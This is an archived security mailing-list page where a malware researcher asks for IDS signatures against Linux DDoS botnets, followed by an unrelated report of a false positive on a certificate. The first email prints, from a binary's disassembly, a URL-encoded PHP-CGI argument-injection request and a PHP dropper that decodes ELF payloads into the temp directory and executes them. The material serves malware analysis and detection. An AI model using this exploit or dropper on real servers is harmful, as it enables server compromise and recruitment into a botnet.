class="">'64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%6'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'3%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%6'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'7%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%6'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'6%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'D%%6E HTTP/1.1'</span><span class="">,</span><span class="">0Dh</span><span class="">,</span><span class="">0Ah</span><span class=""><br><br></span><span class="">// ALSO THE ACCOMPANIED DROPPER SCRIPT</span><span class=""><br><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'Host: %s'</span><span class="">,</span><span class="">0Dh</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 '</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'Firefox/31.0'</span><span class="">,</span><span class="">0Dh</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'Content-Type: application/x-www-form-urlencoded'</span><span class="">,</span><span class="">0Dh</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'Content-Length: %d'</span><span class="">,</span><span class="">0Dh</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'Connection: close'</span><span class="">,</span><span class="">0Dh</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">0Dh</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'%s'</span><span class="">,</span><span class="">0</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D5</span><span class=""> &nbsp; align </span><span class="">8</span><span class=""><br>&nbsp; &nbsp;</span><span class="">:</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> a</span><span class="">?</span><span class="">phpBufferfSBu <br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'&lt;?php'</span><span class="">,</span><span class="">0Ah</span><span class=""> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="">;</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$bufferf = '</span><span class="">,</span><span class="">27h</span><span class="">,</span><span class="">'%s'</span><span class="">,</span><span class="">27h</span><span class="">,</span><span class="">';'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$bufferf2 = '</span><span class="">,</span><span class="">27h</span><span class="">,</span><span class="">'%s'</span><span class="">,</span><span class="">27h</span><span class="">,</span><span class="">';'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$Vdkqrxiiyr3t = sys_get_temp_dir();'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$Vgxl4ifsipo5 = getcwd();'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$Vos03apkyec1 = "OIOIU74u";'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$Vos03apkyec2 = "OIOIU74ux";'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$V5lgt4awdv3b = "chmod 777";'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'{'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'exit(1);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'}else{'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'echo($Vdkqrxiiyr3t);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$bufferf = base64_decode($bufferf);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$bufferf2 = base64_decode($bufferf2);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'system($Vdkqrxiiyr3t . "/$Vos03apkyec2");'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'system($Vdkqrxiiyr3t . "/$Vos03apkyec1");'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'exit(1);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'}'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'?&gt;'</span><span class="">,</span><span class="">0Ah</span><span class="">,</span><span class="">0</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408CE9</span><span class=""> &nbsp; align </span><span class="">10h</span>
</div></div>
<br>
</div>Using the above (1) and (2) we can use the hard coded HTTP HEADER to be blocked by ET Sigs.<br>
</div>Moreover, there is one more vector to use as filtration (below):<br><br>
</div>(3) The injected ELF file to the /tmp directory<br><br><div class=""><div class="">
<span class="">&lt;?</span><span class="">php<br>$bufferf </span><span class="">=</span><span class=""> </span><span class="">'f0VMRgEBAQMAAAAAAAAAAAIAAwABAAA....foo....'</span><span class="">;</span><span class=""><br>$bufferf2 </span><span class="">=</span><span class=""> </span><span class="">'f0VMRgIBAQMAAAAAAAAAAAIAPgABAA....bar...'</span><span class="">;</span><span class=""><br><br></span>
</div></div>&uarr;the above "$bufferf ="and "$buffer2 =" looks like a good spot to filter. But only new version is using this, old version is using different scheme (without PHP injection but PHP system command to wget the bins..)<br><br>
</div>
<div>If you need more confirmation, please do not hesitate to ask.<br>
</div>
<div>It will be nice if this threat also can be blocked.<br><br>
</div>
<div>Herewith I close the series of requests for ET sigs from MalwareMustDie, total 3 DDoS botnets signature. Look forward for the reply with thank you in advance.<br><br>
</div>
<div>Best regards always/Rick<br><br>-- <br>Hendrik Adrian /  <at> unixfreaxjp<br>PGP/<a href="http://MIT.EDU">MIT.EDU</a>: RSA 2048/0xEC61AB9<br><a href="http://about.me/unixfreaxjp">http://about.me/unixfreaxjp</a><br><br>MalwareMustDie,NPO Research Group<br>Web <a href="http://malwaremustdie.org">http://malwaremustdie.org</a><br>Research blog: <a href="http://malwaremustdie.blogspot.com">http://malwaremustdie.blogspot.com</a><br>Wiki &amp; Code: <a href="http://code.google.com/p/malwaremustdie/">http://code.google.com/p/malwaremustdie/</a><br>Report Pastes: <a href="http://pastebin.com/u/MalwareMustDie">http://pastebin.com/u/MalwareMustDie</a><br><br>This email is confidential and may be legally privileged. It is intended<br>as a confidential communication only for the person(s) named above.<br>Any other use or disclosure is prohibited.<br>If you have received this message in error, please delete it, disregard its contents.<br>
</div>
</div></div>
Hendrik Adrian | 21 Sep 14:25 2014

Request #2 - ET signature for Linux/AES.DDoS

Hello ET friends,

Here is another request, for the blocking signature to the different
ELF DDoS threat malware I investigated, called: Linux/AES.DDoS.
I made the dedicated repo for this threat too, in here, feel free to
use as reference:
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483

The complete initial connection to CNC was successfully recorded,
please see the attached images.
<attached 2 PNG files>

I will send the PCAP to the email addresses noted in the Cc.

The "VERSONEX", "Hacke\nr", "INFO" are strings hard coded in the
binary, can be used for sig purpose.
"Mbps" is also useable but I recommended not to, since I saw versions
not using these (the PPC or MIPS version)
Please help to generate the signature accordingly and feel free to
direct email me for more request or questions.

Best regards

Rick of MalwareMustDie
Hello ET friends,

Here is another request, for the blocking signature to the different
ELF DDoS threat malware I investigated, called: Linux/AES.DDoS.
I made the dedicated repo for this threat too, in here, feel free to
use as reference:
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483

The complete initial connection to CNC was successfully recorded,
please see the attached images.
<attached 2 PNG files>

I will send the PCAP to the email addresses noted in the Cc.

The "VERSONEX", "Hacke\nr", "INFO" are strings hard coded in the
binary, can be used for sig purpose.
"Mbps" is also useable but I recommended not to, since I saw versions
not using these (the PPC or MIPS version)
Please help to generate the signature accordingly and feel free to
direct email me for more request or questions.

Best regards

Rick of MalwareMustDie
Hendrik Adrian | 21 Sep 10:27 2014

A request for ELF "Linux/BillGates" DDoS'er ET Signature

Hello Will,

Cc: Matt, ET List

Allow me to request a blocking scheme for the ELF DDoS'er
"Linux/BillGates" as per rapidly spotted in hacked servers and
routers, below is the PoC of the threat:
https://twitter.com/unixfreaxjp/status/513599384286531584
https://twitter.com/unixfreaxjp/status/513586918127173632
https://twitter.com/unixfreaxjp/status/513160603494391808
https://twitter.com/unixfreaxjp/status/512820029037879297
https://twitter.com/unixfreaxjp/status/512686082048004096
(these are only data I gained from Sept 19th until now.. there are
many more of these that I did not tweet)

We are in effort to stop the CNC, so far we nuked more than 35 of
their panels, but there are still many more activity spotted according
to some netflow data I received.

The initial communication pattern during the callback is finally can
be captured completely during one specific analysis of a case, which
will be useful for signature building, as per attached picture.
<attached 2 PNG image files>
Hopefully the ET detection signature can be published, accordingly.
Please kindly support.
The PCAP is a private possession, so it will be shared via direct
email, off-list.

Look forward, with many thank's in advance.

Regards/Rick of MalwareMustDie

-- 
PGP/MIT.EDU: RSA 2048/0xEC61AB9
http://about.me/unixfreaxjp

MalwareMustDie,NPO Research Group
Web http://malwaremustdie.org
Research blog: http://malwaremustdie.blogspot.com
Wiki & Code: http://code.google.com/p/malwaremustdie/
Report Pastes: http://pastebin.com/u/MalwareMustDie

This email is confidential and may be legally privileged. It is intended
as a confidential communication only for the person(s) named above.
Any other use or disclosure is prohibited.
If you have received this message in error, please delete it, disregard
its contents.
Hello Will,

Cc: Matt, ET List

Allow me to request a blocking scheme for the ELF DDoS'er
"Linux/BillGates" as per rapidly spotted in hacked servers and
routers, below is the PoC of the threat:
https://twitter.com/unixfreaxjp/status/513599384286531584
https://twitter.com/unixfreaxjp/status/513586918127173632
https://twitter.com/unixfreaxjp/status/513160603494391808
https://twitter.com/unixfreaxjp/status/512820029037879297
https://twitter.com/unixfreaxjp/status/512686082048004096
(these are only data I gained from Sept 19th until now.. there are
many more of these that I did not tweet)

We are in effort to stop the CNC, so far we nuked more than 35 of
their panels, but there are still many more activity spotted according
to some netflow data I received.

The initial communication pattern during the callback is finally can
be captured completely during one specific analysis of a case, which
will be useful for signature building, as per attached picture.
<attached 2 PNG image files>
Hopefully the ET detection signature can be published, accordingly.
Please kindly support.
The PCAP is a private possession, so it will be shared via direct
email, off-list.

Look forward, with many thank's in advance.

Regards/Rick of MalwareMustDie

--

-- 
PGP/MIT.EDU: RSA 2048/0xEC61AB9
http://about.me/unixfreaxjp

MalwareMustDie,NPO Research Group
Web http://malwaremustdie.org
Research blog: http://malwaremustdie.blogspot.com
Wiki & Code: http://code.google.com/p/malwaremustdie/
Report Pastes: http://pastebin.com/u/MalwareMustDie

This email is confidential and may be legally privileged. It is intended
as a confidential communication only for the person(s) named above.
Any other use or disclosure is prohibited.
If you have received this message in error, please delete it, disregard
its contents.
Duane Howard | 20 Sep 00:42 2014
Picon

FP on sid:2018005

I can provide pcap off-list, if needed:
Cert causing FP:

d <at> zr1:~$ openssl x509 -in cert.der -inform DER -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 0 (0x0)
    Signature Algorithm: md5WithRSAEncryption
        Issuer: C=cn, ST=fj, L=xm, O=cnc, OU=sw, CN=all/emailAddress=cdn-JPAHcpxnCtkqZrZ1v91DedBPR1lH4CV8@public.gmane.org
        Validity
            Not Before: Sep 14 07:34:42 2005 GMT
            Not After : Oct 14 07:34:42 2005 GMT
        Subject: C=cn, ST=fj, L=xm, O=cnc, OU=sw, CN=all/emailAddress=cdn-JPAHcpxnCtkqZrZ1v91DedBPR1lH4CV8@public.gmane.org
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:c2:04:6a:10:5c:ec:13:7d:1c:67:a1:89:db:d6:
                    6f:e2:9e:8e:ca:ea:a7:e4:8f:0d:d5:68:f6:a3:4e:
                    83:93:f2:36:4f:ef:c7:99:cb:56:bd:5f:ed:df:f0:
                    22:98:e6:1d:e9:a9:19:8d:7c:98:4b:44:4f:08:41:
                    08:90:4a:ed:ee:92:8a:6d:bb:7d:9f:23:e2:9f:9c:
                    6a:74:8e:00:30:c3:32:c6:a8:cd:1b:73:f0:87:06:
                    6c:5a:0c:24:9d:5e:7c:f6:09:cb:85:d9:28:9d:f9:
                    25:c4:fc:c8:d7:98:43:15:31:82:4e:d3:0d:f5:cb:
                    5e:27:a4:ab:2b:93:c8:0b:45
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                81:34:D7:72:CB:C5:44:7F:D4:7F:34:DD:A0:EA:BD:55:C7:76:5A:64
            X509v3 Authority Key Identifier: 
                keyid:81:34:D7:72:CB:C5:44:7F:D4:7F:34:DD:A0:EA:BD:55:C7:76:5A:64
                DirName:/C=cn/ST=fj/L=xm/O=cnc/OU=sw/CN=all/emailAddress=cdn-JPAHcpxnCtkqZrZ1v91DedBPR1lH4CV8@public.gmane.org
                serial:00

            X509v3 Basic Constraints: 
                CA:TRUE
    Signature Algorithm: md5WithRSAEncryption
         4f:95:50:6e:47:5b:22:18:a1:d4:c6:59:6f:8d:e5:f7:1e:0f:
         12:3c:a0:54:cb:cb:e2:80:b2:cf:22:ae:3f:7c:94:72:91:2c:
         6b:6b:c4:f2:97:1d:d4:01:5d:93:14:03:ff:53:a9:28:0a:0b:
         da:df:18:c0:ae:a5:fc:9e:2a:d8:51:58:68:ca:bf:d8:7f:d3:
         f9:d7:60:c3:9b:0f:4c:b5:04:90:b4:f2:d0:04:5b:d6:67:1d:
         52:6e:17:3e:e8:82:ae:89:0d:52:ce:0e:0f:37:8b:17:81:0c:
         31:1e:66:de:72:ec:09:c4:22:b6:78:61:a4:26:15:b2:83:85:
         c5:35
-----BEGIN CERTIFICATE-----
MIIDOTCCAqKgAwIBAgIBADANBgkqhkiG9w0BAQQFADB3MQswCQYDVQQGEwJjbjEL
MAkGA1UECBMCZmoxCzAJBgNVBAcTAnhtMQwwCgYDVQQKEwNjbmMxCzAJBgNVBAsT
AnN3MQwwCgYDVQQDEwNhbGwxJTAjBgkqhkiG9w0BCQEWFmNkbkBjaGluYW5ldGNl
bnRlci5jb20wHhcNMDUwOTE0MDczNDQyWhcNMDUxMDE0MDczNDQyWjB3MQswCQYD
VQQGEwJjbjELMAkGA1UECBMCZmoxCzAJBgNVBAcTAnhtMQwwCgYDVQQKEwNjbmMx
CzAJBgNVBAsTAnN3MQwwCgYDVQQDEwNhbGwxJTAjBgkqhkiG9w0BCQEWFmNkbkBj
aGluYW5ldGNlbnRlci5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMIE
ahBc7BN9HGehidvWb+Kejsrqp+SPDdVo9qNOg5PyNk/vx5nLVr1f7d/wIpjmHemp
GY18mEtETwhBCJBK7e6Sim27fZ8j4p+canSOADDDMsaozRtz8IcGbFoMJJ1efPYJ
y4XZKJ35JcT8yNeYQxUxgk7TDfXLXiekqyuTyAtFAgMBAAGjgdQwgdEwHQYDVR0O
BBYEFIE013LLxUR/1H803aDqvVXHdlpkMIGhBgNVHSMEgZkwgZaAFIE013LLxUR/
1H803aDqvVXHdlpkoXukeTB3MQswCQYDVQQGEwJjbjELMAkGA1UECBMCZmoxCzAJ
BgNVBAcTAnhtMQwwCgYDVQQKEwNjbmMxCzAJBgNVBAsTAnN3MQwwCgYDVQQDEwNh
bGwxJTAjBgkqhkiG9w0BCQEWFmNkbkBjaGluYW5ldGNlbnRlci5jb22CAQAwDAYD
VR0TBAUwAwEB/zANBgkqhkiG9w0BAQQFAAOBgQBPlVBuR1siGKHUxllvjeX3Hg8S
PKBUy8vigLLPIq4/fJRykSxra8Tylx3UAV2TFAP/U6koCgva3xjArqX8nirYUVho
yr/Yf9P512DDmw9MtQSQtPLQBFvWZx1Sbhc+6IKuiQ1Szg4PN4sXgQwxHmbecuwJ
xCK2eGGkJhWyg4XFNQ==
-----END CERTIFICATE-----

./d

<div><div dir="ltr">I can provide pcap off-list, if needed:<div>Cert causing FP:<div>
<br><div>
<div>d <at> zr1:~$ openssl x509 -in cert.der -inform DER -text</div>
<div>Certificate:</div>
<div>&nbsp; &nbsp; Data:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; Version: 3 (0x2)</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; Serial Number: 0 (0x0)</div>
<div>&nbsp; &nbsp; Signature Algorithm: md5WithRSAEncryption</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; Issuer: C=cn, ST=fj, L=xm, O=cnc, OU=sw, CN=all/emailAddress=<a href="mailto:cdn <at> chinanetcenter.com">cdn@...</a>
</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; Validity</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Not Before: Sep 14 07:34:42 2005 GMT</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Not After : Oct 14 07:34:42 2005 GMT</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; Subject: C=cn, ST=fj, L=xm, O=cnc, OU=sw, CN=all/emailAddress=<a href="mailto:cdn@...">cdn@...</a>
</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; Subject Public Key Info:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Public Key Algorithm: rsaEncryption</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Public-Key: (1024 bit)</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Modulus:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 00:c2:04:6a:10:5c:ec:13:7d:1c:67:a1:89:db:d6:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6f:e2:9e:8e:ca:ea:a7:e4:8f:0d:d5:68:f6:a3:4e:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 83:93:f2:36:4f:ef:c7:99:cb:56:bd:5f:ed:df:f0:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 22:98:e6:1d:e9:a9:19:8d:7c:98:4b:44:4f:08:41:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 08:90:4a:ed:ee:92:8a:6d:bb:7d:9f:23:e2:9f:9c:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6a:74:8e:00:30:c3:32:c6:a8:cd:1b:73:f0:87:06:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6c:5a:0c:24:9d:5e:7c:f6:09:cb:85:d9:28:9d:f9:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 25:c4:fc:c8:d7:98:43:15:31:82:4e:d3:0d:f5:cb:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 5e:27:a4:ab:2b:93:c8:0b:45</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Exponent: 65537 (0x10001)</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; X509v3 extensions:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; X509v3 Subject Key Identifier:&nbsp;</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 81:34:D7:72:CB:C5:44:7F:D4:7F:34:DD:A0:EA:BD:55:C7:76:5A:64</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; X509v3 Authority Key Identifier:&nbsp;</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; keyid:81:34:D7:72:CB:C5:44:7F:D4:7F:34:DD:A0:EA:BD:55:C7:76:5A:64</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DirName:/C=cn/ST=fj/L=xm/O=cnc/OU=sw/CN=all/emailAddress=<a href="mailto:cdn@...">cdn@...</a>
</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; serial:00</div>
<div><br></div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; X509v3 Basic Constraints:&nbsp;</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CA:TRUE</div>
<div>&nbsp; &nbsp; Signature Algorithm: md5WithRSAEncryption</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;4f:95:50:6e:47:5b:22:18:a1:d4:c6:59:6f:8d:e5:f7:1e:0f:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;12:3c:a0:54:cb:cb:e2:80:b2:cf:22:ae:3f:7c:94:72:91:2c:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;6b:6b:c4:f2:97:1d:d4:01:5d:93:14:03:ff:53:a9:28:0a:0b:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;da:df:18:c0:ae:a5:fc:9e:2a:d8:51:58:68:ca:bf:d8:7f:d3:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;f9:d7:60:c3:9b:0f:4c:b5:04:90:b4:f2:d0:04:5b:d6:67:1d:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;52:6e:17:3e:e8:82:ae:89:0d:52:ce:0e:0f:37:8b:17:81:0c:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;31:1e:66:de:72:ec:09:c4:22:b6:78:61:a4:26:15:b2:83:85:</div>
<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;c5:35</div>
<div>-----BEGIN CERTIFICATE-----</div>
<div>MIIDOTCCAqKgAwIBAgIBADANBgkqhkiG9w0BAQQFADB3MQswCQYDVQQGEwJjbjEL</div>
<div>MAkGA1UECBMCZmoxCzAJBgNVBAcTAnhtMQwwCgYDVQQKEwNjbmMxCzAJBgNVBAsT</div>
<div>AnN3MQwwCgYDVQQDEwNhbGwxJTAjBgkqhkiG9w0BCQEWFmNkbkBjaGluYW5ldGNl</div>
<div>bnRlci5jb20wHhcNMDUwOTE0MDczNDQyWhcNMDUxMDE0MDczNDQyWjB3MQswCQYD</div>
<div>VQQGEwJjbjELMAkGA1UECBMCZmoxCzAJBgNVBAcTAnhtMQwwCgYDVQQKEwNjbmMx</div>
